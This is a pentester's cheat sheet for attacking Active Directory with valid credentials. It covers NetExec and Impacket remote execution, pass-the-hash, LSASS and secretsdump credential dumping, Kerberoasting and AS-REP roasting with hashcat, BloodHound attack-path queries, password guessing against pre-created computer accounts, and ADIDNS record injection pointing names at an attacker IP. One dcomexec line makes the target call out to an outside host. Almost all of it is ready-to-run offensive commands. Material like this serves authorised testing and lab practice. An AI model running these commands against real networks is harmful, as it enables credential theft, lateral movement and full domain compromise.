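##########
With Creds
##########

| https://orange-cyberdefense.github.io/ocd-mindmaps/

.. note::
   Every command on this page takes the password (or NT hash) on the command
   line, so it lands in the shell history and in the process list (``ps``) of
   the attacking host. On a shared jump box prefer the prompting forms where a
   tool has one (``ldapsearch -W``, ``xfreerdp`` without ``/p``), and treat
   everything written under ``/home/user/data`` as loot: keep it on an
   encrypted volume and wipe it when the engagement ends.

.. code-block:: bash

   nxc smb RHOST -u 'USER' -p 'PASS' --shares -x whoami
   nxc rdp RHOST -u 'USER' -p 'PASS'
   nxc winrm RHOST -u 'USER' -p 'PASS' -x whoami
   nxc wmi RHOST -u 'USER' -p 'PASS' -x whoami
   nxc mssql RHOST -u 'USER' -p 'PASS' -x whoami
   nxc ldap RHOST -u 'USER' -p 'PASS'
   nxc ldap RHOST -u 'USER' -p 'PASS' -M adcs
   # --local-auth: authenticate against the host's local SAM instead of the domain
   nxc smb RHOST -u 'USER' -p 'PASS' --shares -x whoami --local-auth
   # Writes to the target's disk: note the path so the file can be removed afterwards
   nxc smb RHOST -u 'USER' -p 'PASS' --shares --put-file rustscan.exe /windows/temp/rustscan.exe
   # Pass-the-hash: -H takes the NT hash, no password needed
   nxc smb RHOST -u 'USER' --local-auth -H 3e1aef05e1b65e4f3cee0e60b0eba2de
   # lsassy reads LSASS memory remotely: needs local admin and is a classic EDR trigger
   nxc smb RHOST -u 'Administrator' -p 'PASS' -M lsassy
   # Lists gMSA accounts and dumps the managed password of those the user may read
   nxc ldap ghost.htb -u 'USER' -p 'PASS' --gmsa
   enum4linux RHOST -u 'USER' -p 'PASS'

.. code-block:: bash

   mssqlclient.py 'USER':'PASS'@RHOST -debug -windows-auth

   # RDP. /cert:ignore disables TLS certificate validation: fine on a lab box,
   # an open door to MITM on a real network. /drive maps /tmp/share into the
   # session, so anything dropped there by the target ends up on this host.
   mkdir /tmp/share
   xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:hackerbeepboop /p:Blabliblou_1 +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share
   # Same with pass-the-hash (Restricted Admin mode must be enabled on the target)
   xfreerdp /port:3389 /v:1.2.3.4 /d:DOMAIN /u:user /pth:3e1aef05e1b65e4f3cee0e60b0eba2de +clipboard /cert:ignore /dynamic-resolution /drive:/tmp/share,share

   # Remote execution. These all need local admin on the target; psexec/smbexec
   # create a service, atexec a scheduled task, so they leave artefacts behind.
   psexec.py 'domain.local'/'Administrator':'pass'@1.2.3.4
   psexec.py 'Administrator':'pass'@1.2.3.4
   psexec.py -hashes ":e7db1b821fac71d089d0b42d4a5bf605" Administrator@1.2.3.4 powershell.exe
   smbexec.py 'Administrator':'pass'@1.2.3.4
   wmiexec.py 'user':'pass'@1.2.3.4 'powershell.exe "whoami /all"'
   atexec.py 'user':'pass'@1.2.3.4 whoami
   dcomexec.py 'user':'pass'@1.2.3.4 'whoami'
   # Blind test for execution: listen on 445 first, the target connects to \\4.3.2.1 if the command ran
   dcomexec.py -object MMC20 'user':'pass'@1.2.3.4 '\\4.3.2.1\test' -nooutput
   evil-winrm -i domain.com -u user -p 'pass'   # don't forget to add the domain in /etc/hosts

   # Credential dumping. The output is sensitive loot: store it accordingly.
   secretsdump.py Administrator:'pass'@1.2.3.4 -history
   secretsdump.py user@1.2.3.4 -hashes ':3e1aef05e1b65e4f3cee0e60b0eba2de' -history
   donpapi collect -u Administrator -p 'pass' -d domain.local -t 1.2.3.4 --fetch-pvk

Kerberos
========

Getting a Kerberos TGT (ccache)

.. code-block:: bash

   getTGT.py 'BOX.HTB'/'USER':'PASS' -dc-ip 'DC01.BOX.HTB'
   # gMSA: the sAMAccountName ends with '$' (GMSA01$); use the NT hash obtained with --gmsa
   getTGT.py 'BOX.HTB'/'GMSA01' -hashes ':cfa8f6edd15de88a17a9652114e3f4a6' -dc-ip 'DC01.BOX.HTB'
   # getTGT writes <USER>.ccache in the current directory
   export KRB5CCNAME=USER.ccache

.. code-block:: bash

   # Kerberos needs the target FQDN (not an IP) so the service ticket SPN matches,
   # and the attacker clock within 5 minutes of the DC (KRB_AP_ERR_SKEW otherwise)
   nxc smb DC01.BOX.HTB -k --use-kcache
   wmiexec.py -k DC01.BOX.HTB 'powershell.exe "whoami /all"'

.. code-block:: bash

   # Minimal krb5.conf. dns_canonicalize_hostname/rdns = false stop libkrb5 from
   # rewriting the host part of the SPN through (reverse) DNS, which breaks when
   # the target is only resolvable through /etc/hosts.
   cat <<'EOF'>/home/user/data/krb5.conf
   [libdefaults]
       default_realm = BOX.HTB
       dns_canonicalize_hostname = false
       rdns = false

   [realms]
       BOX.HTB = {
           kdc = DC01.BOX.HTB
           admin_server = DC01.BOX.HTB
       }

   [domain_realm]
       BOX.HTB = BOX.HTB
       .BOX.HTB = BOX.HTB
       web.BOX.HTB = BOX.HTB
   EOF
   export KRB5_CONFIG='/home/user/data/krb5.conf'
   export KRB5CCNAME='/home/user/data/user.ccache'
   # Verbose Kerberos debugging on stdout; unset it once things work
   export KRB5_TRACE='/dev/stdout'

.. code-block:: bash

   # -r: the Kerberos realm, evil-winrm then uses the ticket in KRB5CCNAME
   evil-winrm -i 'DC01.BOX.HTB' -r 'BOX.HTB' -u 'USER'

****************
Active Directory
****************

LDAP enumeration

.. code-block:: bash

   # A simple bind over plain ldap:// sends the password in clear text: prefer ldaps://
   # (or -ZZ for StartTLS), and -W to be prompted instead of passing -w on the command line
   ldapsearch -H 'ldap://domain.com' -D user@domain.com -w 'pass' -b "dc=domain,dc=com" "*" > /home/user/data/ldapsearch
   ldeep ldap -u user -p 'pass' -d domain.com -s ldaps://1.2.3.4:636 all /home/user/data/ldeep
   # 3269 is the global catalog over TLS: forest-wide results, partial attribute set
   ldapdomaindump ldaps://1.2.3.4:3269 -u 'domain.com\user' -p 'pass'

Kerberoasting

.. code-block:: bash

   # Requests a service ticket for every user with an SPN; the TGS-REQs are logged on the DC (event 4769)
   GetUserSPNs.py -dc-ip 1.2.3.10 'domain.com/user:pass' -request -outputfile /home/user/data/hashes.kerberoast
   hashcat -m 13100 -a 0 /home/user/data/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT

**********
Bloodhound
**********

| Install BloodHound from https://github.com/SpecterOps/BloodHound
| BloodHound: v7.3.1

Using the python collector to extract infos

.. code-block:: bash

   pipx install git+https://github.com/dirkjanm/BloodHound.py@bloodhound-ce
   # -ns: resolve through the DC; --dns-tcp avoids truncated UDP answers.
   # -c All,LoggedOn connects to every computer in the domain for session data: slow and noisy.
   bloodhound-ce-python --dns-tcp -u 'USER' -p 'PASS' -ns '10.129.41.25' -d 'BOX.htb' -c All,LoggedOn

Get all descriptions, users, computers

.. code-block:: bash

   # Quick and dirty: relies on jq's pretty-printed '"key": "value"' layout, so a
   # value containing an escaped quote is truncated. Good enough for a first look.
   cat *.json|jq|grep -i '"description"'| cut '-d"' -f4 | sort -u | tee /home/user/data/descriptions
   cat *users.json|jq|grep -i '"samaccountname"' | cut '-d"' -f4 | tee /home/user/data/users
   cat *computers.json|jq|grep -i '"samaccountname"' | cut '-d"' -f4 | tee /home/user/data/computers

Enumeration

The queries below are BloodHound CE Cypher (``system_tags``, ``ADCSESC*`` edges);
paste them in the Cypher tab of the UI.

.. code-block:: cypher

   // All users group membership, excluding default low-level groups (users, everyone..)
   WITH ['-513', '-S-1-1-0', '-S-1-5-11', '-S-1-5-32-554', '-S-1-5-32-545'] AS usergroups
   MATCH p=(u:User)-[r:MemberOf*1..]->(g:Group)
   WHERE NOT ANY(group IN usergroups WHERE g.objectid ENDS WITH group)
   RETURN p

   // Domains and computers
   MATCH p1 = (d:Domain)
   OPTIONAL MATCH p2 = (d:Domain)-[:Contains*1..]->(c:Computer)
   OPTIONAL MATCH p3 = shortestPath((d:Domain)-[*1..]->(n:Domain)) WHERE d<>n
   WITH collect(p1) + collect(p2) + collect(p3) AS paths
   UNWIND paths AS path
   RETURN path

   // Users ACL
   MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true RETURN p

   // Search for relation/activity between users and computers
   // (-512 Domain Admins and -544 Administrators are excluded as sources)
   WITH ['-512','-544'] AS exclude
   MATCH p1=(d:Domain)-[:Contains*1..]->(c:Computer)
   OPTIONAL MATCH p2=(n)-[r:CanRDP|CanPSRemote|ExecuteDCOM|AdminTo|Owns]->(:Computer)
   WHERE NOT ANY(x IN exclude WHERE n.objectid ENDS WITH x)
   OPTIONAL MATCH p3=(:Computer)-[:HasSession]->()
   WITH collect(p1) + collect(p2) + collect(p3) AS paths
   UNWIND paths AS path
   RETURN path

   WITH ['-512','-544'] AS exclude
   MATCH p=(n)-[:HasSession|CanRDP|CanPSRemote|ExecuteDCOM|AdminTo*1..]->()
   WHERE NOT ANY(x IN exclude WHERE n.objectid ENDS WITH x)
   RETURN p

   // GPOs
   MATCH p1=()-[r:Owns]->(c:GPO)
   OPTIONAL MATCH p2=()-[:GPLink]->()
   WITH collect(p1) + collect(p2) AS paths
   UNWIND paths AS path
   RETURN path

   MATCH p1=()-[r:Owns]->(c:GPO) RETURN p1

Leverage owned objects

Mark compromised principals as owned in the UI first: the queries filter on
``system_tags CONTAINS 'owned'`` and target ``admin_tier_0`` (high value) nodes.

.. code-block:: cypher

   // Owned => High value (without CanRDP, CanPSRemote, HasSession)
   MATCH (m),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n))
   WHERE m<>n and COALESCE(m.system_tags, '') CONTAINS 'owned' and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0'
   RETURN p

   // Owned => Computers
   MATCH (m),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n))
   WHERE m<>n and COALESCE(m.system_tags, '') CONTAINS 'owned'
   OPTIONAL MATCH p2=(n:Computer)-[r:HasSession]->(m:User)
   WHERE COALESCE(m.system_tags, '') CONTAINS 'owned'
   WITH collect(p) + collect(p2) AS paths
   UNWIND paths AS path
   RETURN path

Easy wins

.. code-block:: cypher

   // Users/Computer => High value (without CanRDP, CanPSRemote, HasSession)
   MATCH (m:User),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n))
   WHERE m<>n and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0'
   RETURN p

   MATCH (m:Computer),(n),p=shortestPath((m)-[:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n))
   WHERE m<>n and COALESCE(n.system_tags, '') CONTAINS 'admin_tier_0'
   RETURN p

   // Users => Computers
   MATCH (m:User),(n:Computer),p=shortestPath((m)-[:CanRDP|CanPSRemote|MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GPLink|AddAllowedToAct|AllowedToAct|WriteAccountRestrictions|SQLAdmin|ReadGMSAPassword|HasSIDHistory|SyncLAPSPassword|DumpSMSAPassword|AZMGGrantRole|AZMGAddSecret|AZMGAddOwner|AZMGAddMember|AZMGGrantAppRoles|AZNodeResourceGroup|AZWebsiteContributor|AZAutomationContributor|AZAKSContributor|AZAddMembers|AZAddOwner|AZAddSecret|AZAvereContributor|AZContains|AZContributor|AZExecuteCommand|AZGetCertificates|AZGetKeys|AZGetSecrets|AZGlobalAdmin|AZHasRole|AZManagedIdentity|AZMemberOf|AZOwns|AZPrivilegedAuthAdmin|AZPrivilegedRoleAdmin|AZResetPassword|AZUserAccessAdministrator|AZAppAdmin|AZCloudAppAdmin|AZRunsAs|AZKeyVaultContributor|AZVMAdminLogin|AZVMContributor|AZLogicAppContributor|AddSelf|WriteSPN|AddKeyCredentialLink|DCSync*1..]->(n))
   WHERE m<>n
   OPTIONAL MATCH p2=(n:Computer)-[r:HasSession]->(m:User)
   WITH collect(p) + collect(p2) AS paths
   UNWIND paths AS path
   RETURN path

   // Any unconstrained delegation?
   MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

   // Any constrained / resource-based constrained delegation?
   MATCH p=()-[r:AllowedToDelegate|AllowedToAct]->() RETURN p
   MATCH (c:Computer), (t:Computer), p=((c)-[:AllowedToDelegate|AllowedToAct]->(t)) return p

   // Kerberoastable?
   MATCH (n:User) WHERE n.hasspn=true RETURN n

   // AS-REP roastable (pre-auth not required)?
   MATCH (u:User {dontreqpreauth: true}) RETURN u

   // Pre-created computer accounts? (then try either a blank password or the lowercase computer name without '$')
   MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.pwdlastset = c.whencreated and c.enabled = true RETURN p
   MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.pwdlastset < c.lastlogon - (60*60*24*45) and c.enabled = true RETURN p

Follow-up commands for the findings above:

.. code-block:: bash

   # Kerberoast
   GetUserSPNs.py -dc-ip 1.2.3.10 'do.main/user:pass' -request -outputfile /home/user/data/hashes.kerberoast
   # Or:
   nxc ldap 1.2.3.10 -d 'do.main' -u 'user' -p 'pass' --kerberoast /home/user/data/hashes.kerberoast
   hashcat -m 13100 -a 0 /home/user/data/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT

   # AS-REP roast (no credentials needed, only the user list)
   GetNPUsers.py -debug 'do.main/' -usersfile /home/user/data/users -outputfile /home/user/data/hashes.asreproast -format hashcat -dc-ip 1.2.3.10
   sudo hashcat -m 18200 /home/user/data/hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT

   # Pre-created computer accounts: candidate password = lowercase computer name without '$'
   cat /home/user/data/computers | tr '[:upper:]' '[:lower:]' | tr -d '$' > /home/user/data/computerspass
   # --no-bruteforce pairs users and passwords line by line. A pre-created account whose
   # password is right answers STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT rather than a success
   # (see the TrustedSec post); the pre2k tool handles that case for you.
   nxc smb DC01 -u /home/user/data/computers -p /home/user/data/computerspass --continue-on-success --no-bruteforce
   # Ref https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts

Others (testing)

.. code-block:: cypher

   MATCH p=()-[r:HasSession]->() RETURN p
   MATCH p=()-[r:Owns]->(c:Computer) RETURN p
   Match (n:GPO) return n
   MATCH p=(u:User)-[]->() RETURN p
   MATCH p=(u:User)-[r:GenericAll]->() RETURN p
   MATCH p=()-[r:GenericAll]->() RETURN p
   // Domain Users
   MATCH p=(d:Domain)-[r:Contains*1..]->(n:User) RETURN p
   // Map of domains/groups/users
   MATCH p=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN p
   MATCH (m),(n:OU),p=shortestPath((m)-[*1..]->(n)) where m<>n RETURN p
   // ADCS escalation edges (BloodHound CE)
   MATCH p=()-[r:ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC6a|ADCSESC6b|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13]->() RETURN p

******
ADIDNS
******

| https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/adidns-abuse
| https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing

In order to function properly, Active Directory services need DNS.
In that matter, Active Directory Domain Services (AD-DS) offer an integrated
storage and replication service for DNS records. This is called Active
Directory Integrated DNS (ADIDNS). By default any authenticated user can create
new records in the zone; a user who is allowed to can therefore add DNS
records, which redirects every client of the domain that resolves the name.

.. warning::
   Records added this way are real objects in AD and replicate to every DC.
   Remove them when you are done (``dnstool.py -a remove``) and keep a list of
   what you created for the engagement report.

.. code-block:: bash

   # Example using a Kerberos ticket
   export KRB5CCNAME="/home/user/data/user.ccache"
   python3 dnstool.py -u 'DOMAIN.HTB\user' -k "DC01.DOMAIN.HTB" --tcp -r intranet.DOMAIN.HTB -a add -d ATTACKERIP -dns-ip DNSSRVIP
   [-] Connecting to host...
   [-] Binding to host
   [+] Bind OK
   [-] Adding new record
   [+] LDAP operation completed successfully

   # Example when you don't have enough rights (the record or zone ACL denies creation)
   python3 dnstool.py -u 'DOMAIN.HTB\user' -p 'pass' 'DC01.DOMAIN.HTB' -r intranet.DOMAIN.HTB -a add -d ATTACKERIP -dns-ip DNSSRVIP
   [-] Connecting to host...
   [-] Binding to host
   [+] Bind OK
   [-] Adding new record
   [!] LDAP operation failed. Message returned from server: insufficientAccessRights 00000005: SecErr: DSID-03152E29, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

Adding a record using bloodyAD

.. code-block:: bash

   bloodyAD --host 1.2.3.4 -d 'domain.htb' -u 'USER' -p 'PASS' add dnsRecord test 10.10.14.56
   # Dump the zone to verify the record (and to find it again for cleanup)
   bloodyAD --host 1.2.3.4 -d 'domain.htb' -u 'USER' -p 'PASS' get dnsDump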